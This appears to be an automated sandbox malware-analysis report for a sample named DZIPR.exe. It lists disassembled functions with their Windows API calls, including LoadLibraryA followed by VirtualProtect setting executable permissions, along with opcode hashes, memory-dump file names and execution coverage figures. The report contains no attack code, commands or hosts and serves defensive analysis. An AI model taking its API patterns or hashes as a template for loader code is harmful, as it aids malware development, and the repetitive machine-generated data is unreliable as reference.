Instruction Fuzzy Hash: 98018833905A35678B122E618D0CE8F3F6AAF453ACF62E125FF1455101E731D722C6D5

Function 6FE4057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FE40586

Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F

__getptd.LIBCMT ref: 6FE4059D
__amsg_exit.LIBCMT ref: 6FE405AB
__lock.LIBCMT ref: 6FE405BB

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 26370125d81e536a8758f622388bb905d23de6fe538cee36978827f41e070221
Instruction ID: afa90daea4704bc8cabb8f6f735690237c152308b0193a7026be9001ae6b1381
Opcode Fuzzy Hash: 26370125d81e536a8758f622388bb905d23de6fe538cee36978827f41e070221
Instruction Fuzzy Hash: E6F06D33D40720CBDB20ABA8A409B587EA0AF60728F71156ED560A73E1CB39A941CB52

Function 6FE2A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6FE2A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FE2A6B6), ref: 6FE2A5AA
Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE2A5CB
Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FE2A5DD
Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FE2A5EF
Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FE2A601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FE2A6D0
SetLastError.KERNEL32(0000006F), ref: 6FE2A6E7

Strings

, xrefs: 6FE2A705

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: 6cb752efe9e69c43e189ae4566d0193ec339ab21aa986f1df19f0e5b3a85ca3f
Instruction ID: 36eb88a9189be133cfd63b66aeac8cf97b3d6ebe2efbda2f3df17c184506b48e
Opcode Fuzzy Hash: 6cb752efe9e69c43e189ae4566d0193ec339ab21aa986f1df19f0e5b3a85ca3f
Instruction Fuzzy Hash: B3217C7084161C9ECB20DF70C8487DABBF4BF05728F20869EC069D62C0EB74AA89DF54

Function 6FE28E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FE28E78
PathFindExtensionW.SHLWAPI(?), ref: 6FE28E8E

Part of subcall function 6FE28BDF: __EH_prolog3_GS.LIBCMT ref: 6FE28BE9
Part of subcall function 6FE28BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FE28EB7,?,?), ref: 6FE28C19
Part of subcall function 6FE28BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FE28C2D
Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C69
Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28C77
Part of subcall function 6FE28BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FE28C94
Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FE28CBF
Part of subcall function 6FE28BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FE28CC8
Part of subcall function 6FE28BDF: GetModuleFileNameW.KERNEL32(6FE20000,?,00000105), ref: 6FE28D7F

Strings

%s%s.dll, xrefs: 6FE28E99

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 4c2d58cd9cf153a0ca06a3cd221c2d31389cdf641cafd31cf9fb77ae2dd9121f
Instruction ID: aaeae8beb4dbc6ca5b22ccc3a91bfabc4b57dbc11135cbc296b809eba306b219
Opcode Fuzzy Hash: 4c2d58cd9cf153a0ca06a3cd221c2d31389cdf641cafd31cf9fb77ae2dd9121f
Instruction Fuzzy Hash: 7A01A771A05518ABCB05DF68DC459EFBBF9BF4A314F11046BA506E7140E670DB05CB90

Function 6FE3C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FE35017: __getptd.LIBCMT ref: 6FE3501D
Part of subcall function 6FE35017: __getptd.LIBCMT ref: 6FE3502D

__getptd.LIBCMT ref: 6FE3C54B

Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F

__getptd.LIBCMT ref: 6FE3C559

Strings

csm, xrefs: 6FE3C567

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
Instruction ID: fec9954aa439a2d7619a20997f36e8ee10862e3e622510f685081fbffe2be97e
Opcode Fuzzy Hash: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
Instruction Fuzzy Hash: 57011676E04335AACF248E68D4486AEBFF5AF10319F74442ED4529A790DB32E680DF41

Function 6FE30DE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FE30DE9

Strings

xPo, xrefs: 6FE30E13
Po, xrefs: 6FE30E0B

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: H_prolog3
String ID: Po$xPo
API String ID: 431132790-3544800484
Opcode ID: fcb5e5f9621299b8e67a7befae0370184c9e91025cf6186b2cef199643ae8591
Instruction ID: 70934e4e0d6816ea86e6611915a097f5c77aa56e905876ebdd9bd8aafe53f8a4
Opcode Fuzzy Hash: fcb5e5f9621299b8e67a7befae0370184c9e91025cf6186b2cef199643ae8591
Instruction Fuzzy Hash: BBF0AD73F023318BDF64AB6A89493ADBEA06B0431DF30164ED2A54B2D0C375A840C682

Function 6FE272FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FE27318
PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6FE27540,00000000,?), ref: 6FE2732D

Strings

@uo, xrefs: 6FE27302, 6FE27333

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: PathRootStrip_memset
String ID: @uo
API String ID: 2213896960-1137737743
Opcode ID: 465b4581f0f7cd2a7c722edc4faa9762cec182679c155bbd13a38c20875ae2a9
Instruction ID: d6a7fdbf344a3447d870c1cc9b60c5ad946f89285812e44d66aaccf116ba60f8
Opcode Fuzzy Hash: 465b4581f0f7cd2a7c722edc4faa9762cec182679c155bbd13a38c20875ae2a9
Instruction Fuzzy Hash: 21E0D83710422437C60066998C44EEF3F9D8FC7774F204219F938572D09F34651186B5

Function 6FE2BF5D Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6FE2BFBC
LeaveCriticalSection.KERNEL32(?), ref: 6FE2BFCC
LocalFree.KERNEL32(?), ref: 6FE2BFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6FE2BFE7

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: c1362ca6dc7c1ae899c5b12aa2ca0b7b0a496148958c399a8660a3d15a5524eb
Instruction ID: ac4aece6454974f4458b80f9a6dbdb99699dfdb77c964eee584bd277c3335031
Opcode Fuzzy Hash: c1362ca6dc7c1ae899c5b12aa2ca0b7b0a496148958c399a8660a3d15a5524eb
Instruction Fuzzy Hash: 2C116731A00A04EFE714DF54C884F9ABBA5FF46329F20842EF1528B6A1DB71BA51CF50

Function 6FE2C220 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6FE534A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C25A
InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C26C
LeaveCriticalSection.KERNEL32(6FE534A8,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2C279
EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FE2BB27,00000010,00000008,6FE2AF1F,6FE2AEC2,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2C289

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 252d75f1eeec4baa02fdbf8dc08ea8d332e00dc091942ff379438f9ca22b758c
Instruction ID: e9a7e84e1767ca67cd903f77076776e5344573d2c744198ff23d44d2f2647e96
Opcode Fuzzy Hash: 252d75f1eeec4baa02fdbf8dc08ea8d332e00dc091942ff379438f9ca22b758c
Instruction Fuzzy Hash: 84F06873604514AFDA055A98DC467157FABEBD3335F31001BE25887241DF31D5A5C9A1

Function 6FE2BA5B Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6FE532EC,?,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?), ref: 6FE2BA69
TlsGetValue.KERNEL32(6FE532D0,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA7D
LeaveCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA93
LeaveCriticalSection.KERNEL32(6FE532EC,?,?,?,6FE2C0B7,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BA9E

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 57bf96cf5fa022f4b007c9649e924d63fe9c354a6bac88add4fa7b37b74cd872
Instruction ID: f906f38df281d313b3e3325b209a609e693d52a0cb0457eaec1739610a4d39e8
Opcode Fuzzy Hash: 57bf96cf5fa022f4b007c9649e924d63fe9c354a6bac88add4fa7b37b74cd872
Instruction Fuzzy Hash: 07F030B6604A049FD7209F58C888C4A7BE9FF86374725445BE65993201E630F856DFA0

Analysis Process: DZIPR.exePID: 7596, Parent PID: 7580COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1673
Total number of Limit Nodes:	29

Executed Functions

Function 6C9163F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6C916602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C91663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C916654

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: f2ad1a0c7219b2fd2e5db772e71672e583ea498fdc023710c20e06f344bfa214
Instruction ID: 9a89e75fe34bad34f95949851d5e01885960c2a416b96b48172a99d0d84b7afa
Opcode Fuzzy Hash: f2ad1a0c7219b2fd2e5db772e71672e583ea498fdc023710c20e06f344bfa214
Instruction Fuzzy Hash: 00A1CD30A0C35A8FC315CF19C48162AFBE6FF89308F19896DE89997A56D730E955CB81

Function 6C915CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: 1e4188ac96c2b19a66f8fbba2bdf0eed366604cf7c5d37f4aa78c5815407e02e
Instruction ID: eda0445fe0aba97647ec7a428adf108fad912dd0a8ea2d9a9fe06b892224bd87
Opcode Fuzzy Hash: 1e4188ac96c2b19a66f8fbba2bdf0eed366604cf7c5d37f4aa78c5815407e02e
Instruction Fuzzy Hash: 7CE18BB0A0870A8FC714DF1AC48162AFBF5FF89308F65896DE89987B11D730E855CB81

Function 6C915E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C915ECA

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 3ee80c8733a0a28248d7c5b971d5973264048f088364e0b9435cb9b8821bf90e
Instruction ID: 1e23d36b4a3cd88fad73e3e742af38859ee946538d685c5109d56c047f99d1fd
Opcode Fuzzy Hash: 3ee80c8733a0a28248d7c5b971d5973264048f088364e0b9435cb9b8821bf90e
Instruction Fuzzy Hash: F4A19F70A0C30A8FC708DF19C49163AB7E6FF89308F25856DE89687B56D770E965CB81

Function 6C91BC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(6C9432EC), ref: 6C91BC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C9432D0,6C9432D0,?,6C91C0A4,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BCB7
GlobalHandle.KERNEL32(00E7C9A8), ref: 6C91BCC0
GlobalUnlock.KERNEL32(00000000), ref: 6C91BCCA
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C91BCE3
GlobalHandle.KERNEL32(00E7C9A8), ref: 6C91BCF5
GlobalLock.KERNEL32(00000000), ref: 6C91BCFC
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BD05
GlobalLock.KERNEL32(00000000), ref: 6C91BD11
_memset.LIBCMT ref: 6C91BD2B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BD59

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 76542adbc2fe5cdfbd252f580aeea79782363df4a9de268fe4764d1e884d76b1
Instruction ID: 2f5d7fce34b392837f71a77927cb3151517a44a73a10d15f9e3c4e59b764a2ac
Opcode Fuzzy Hash: 76542adbc2fe5cdfbd252f580aeea79782363df4a9de268fe4764d1e884d76b1
Instruction Fuzzy Hash: E531E4B1608708AFDB248FA8C84AA5A7BFAFF44304B14496EE556D7F10DB70F944CB94

Function 6C9164E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6C916602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C91663B

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 4662a576adbf947e9f92a86eeceb754c3f01d54ad8662a0ae5fd6a6318481d00
Instruction ID: cb61a0c260090c014d3802f1310ad85770562c9686076dc7d015b45cf1cc5365
Opcode Fuzzy Hash: 4662a576adbf947e9f92a86eeceb754c3f01d54ad8662a0ae5fd6a6318481d00
Instruction Fuzzy Hash: 3551D030A0C35A8FC715CF18C88062AFBE6EFC9308F19896DE88587716C630E906CB91

Function 6C916750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C93C168), ref: 6C916300

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c3a6051868806f7f8124935c01b491f59872f1864718a4c3efeb1d9d902016c7
Instruction ID: f2d3736d8f172eebe95c3fb4b4146ad580683dd9b72c424af3a743f5014f06c6
Opcode Fuzzy Hash: c3a6051868806f7f8124935c01b491f59872f1864718a4c3efeb1d9d902016c7
Instruction Fuzzy Hash: 6F41B031A0C7498FC708CF09C88167AB7F6FBC5318F19896DE88987B15D631E856CB80

Function 6C9162D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C93C168), ref: 6C916300

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e9b9dd3690da5cb15317c2a127db35814a2837f31c29f55f43cfd712a9cd74af
Instruction ID: e3658cca07bd586bd5f33d6f012638cdd4266a5557dc767f7c43cdfbd557bb4a
Opcode Fuzzy Hash: e9b9dd3690da5cb15317c2a127db35814a2837f31c29f55f43cfd712a9cd74af
Instruction Fuzzy Hash: 1031CE32A0C74A8FC708CF08C88167AB7E6EBC5314F19C96CE89597B16D630F856CB81

Function 6C91C050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6C91C057

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
